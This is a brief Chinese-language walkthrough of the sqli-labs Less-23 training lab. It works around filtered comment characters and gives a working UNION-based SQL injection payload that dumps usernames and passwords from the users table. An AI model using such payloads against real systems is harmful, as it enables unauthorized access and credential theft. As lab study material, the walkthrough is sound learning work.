sqli-labs Less-23

首先判断注入类型为单字符注入，但是用0' or 1=1 %23进行注入时发现没有正确回显

1.png

结合题名大概猜测过滤了注释符。
通过报错猜测sql语句为

select * from users where id='$id' limit 0,1

因为过滤了注释符，无法通过注释掉后面一个'来闭合引号
既然要闭合'，那么必须通过构造字符串
因此考虑使用order by语句
构造payload：

?id=0' union select 1,group_concat(username),group_concat(password) from users order by '1

2.png

注入成功